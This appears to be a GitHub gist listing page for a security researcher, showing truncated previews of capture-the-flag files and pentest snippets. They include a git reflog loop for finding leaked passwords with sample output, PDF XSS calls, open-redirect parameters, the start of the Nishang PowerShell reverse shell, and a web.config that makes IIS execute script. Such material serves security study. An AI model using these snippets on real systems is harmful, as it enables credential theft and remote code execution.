Aj Dumanhug ajdumanhug
View dontmindme.json
[
{
"text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}",
"author": "AJ Dumanhug"
}
]
View Git Creds.md

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@ajdumanhug
ajdumanhug / pdf.txt
Created Jan 28, 2021
App Object for PDF
View pdf.txt
app.alert\("XSS"\);
app.response\("XSS"\);
app.launchURL\("https://example.com"\);
Other Methods:
- browseForDoc
View chall.py
important = ""
pip_important = "flag{h4ckst33tb0ys}"
import base64
randomvar = important.encode('ascii')
important_tottaly = base64.b64encode(randomvar)
import random
nothin_important = important_tottaly.decode('ascii')
pip_important = ""
supa_strong = ""
for n in nothin_important:
@ajdumanhug
ajdumanhug / cta.type
Created Nov 12, 2020
call_to_action[type] for Facebook Pages
View cta.type
BOOK_TRAVEL, CONTACT_US, DONATE, DONATE_NOW, DOWNLOAD, GET_DIRECTIONS, GO_LIVE, INTERESTED, LEARN_MORE, LIKE_PAGE, MESSAGE_PAGE, SAVE, SEND_TIP, SHOP_NOW, SIGN_UP, VIEW_INSTAGRAM_PROFILE, INSTAGRAM_MESSAGE, LOYALTY_LEARN_MORE, PURCHASE_GIFT_CARDS, PAY_TO_ACCESS, GET_MOBILE_APP, INSTALL_MOBILE_APP, USE_MOBILE_APP, INSTALL_APP, USE_APP, PLAY_GAME, WATCH_VIDEO, WATCH_MORE, OPEN_LINK, NO_BUTTON, LISTEN_MUSIC, MOBILE_DOWNLOAD, GET_OFFER, GET_OFFER_VIEW, BUY_NOW, BUY_TICKETS, UPDATE_APP, BET_NOW, ADD_TO_CART, ORDER_NOW, SELL_NOW, GET_SHOWTIMES, LISTEN_NOW, GET_EVENT_TICKETS, SEARCH_MORE, PRE_REGISTER, SWIPE_UP_PRODUCT, SWIPE_UP_SHOP, CALL, MISSED_CALL, CALL_NOW, CALL_ME, APPLY_NOW, BUY, GET_QUOTE, SUBSCRIBE, RECORD_NOW, VOTE_NOW, GIVE_FREE_RIDES, REGISTER_NOW, OPEN_MESSENGER_EXT, EVENT_RSVP, CIVIC_ACTION, SEND_INVITES, REFER_FRIENDS, REQUEST_TIME, SEE_MENU, WHATSAPP_MESSAGE, SEARCH, TRY_IT, TRY_ON, LINK_CARD, DIAL_CODE, FIND_YOUR_GROUPS
View fb.ip
enable_tc_mode
guest-access traffic-class internet internet
guest-access traffic-class 1 name xwf
guest-access traffic-class 1 permit *.expresswifi.com
guest-access traffic-class 1 permit xwf-static.xx.fbcdn.net
guest-access traffic-class 1 permit xwf-scontent.xx.fbcdn.net
guest-access traffic-class 1 permit xwf.facebook.com
guest-access traffic-class 1 permit *.xwf.fyi
guest-access traffic-class 1 permit h.facebook.com
guest-access traffic-class 1 permit graph.expresswifi.com
@ajdumanhug
ajdumanhug / openredirection.payloads
Created Jul 31, 2020
List of parameters for Open Redirection
View openredirection.payloads
dest
redirect
uri
path
continue
url
window
next
data
reference
@ajdumanhug
ajdumanhug / shell.ps1
Created Jun 8, 2020
Reverse Shell using Nishang
View shell.ps1
function Invoke-PowerShellTcp
{
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
@ajdumanhug
ajdumanhug / web.config
Created Jun 8, 2020
web.config with vb script
View web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />